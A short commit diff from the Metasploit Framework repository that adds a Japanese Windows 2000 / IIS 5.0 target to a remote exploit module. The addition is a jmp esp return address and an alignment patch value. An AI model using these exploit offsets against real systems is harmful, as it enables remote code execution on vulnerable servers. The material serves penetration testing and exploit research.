added japanese target from TomokiSanaki
git-svn-id: file:///home/svn/framework3/trunk@7578 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
b9939a836f
commit
5dbd32cd98
|
@ -68,6 +68,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
|
||||
},
|
||||
],
|
||||
[
|
||||
# target from TomokiSanaki
|
||||
'Windows 2000 SP0-SP3 Japanese (IIS 5.0)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x774fa593, # jmp esp in ?? (Japanese)
|
||||
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Aug 31 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
|
Loading…
Reference in New Issue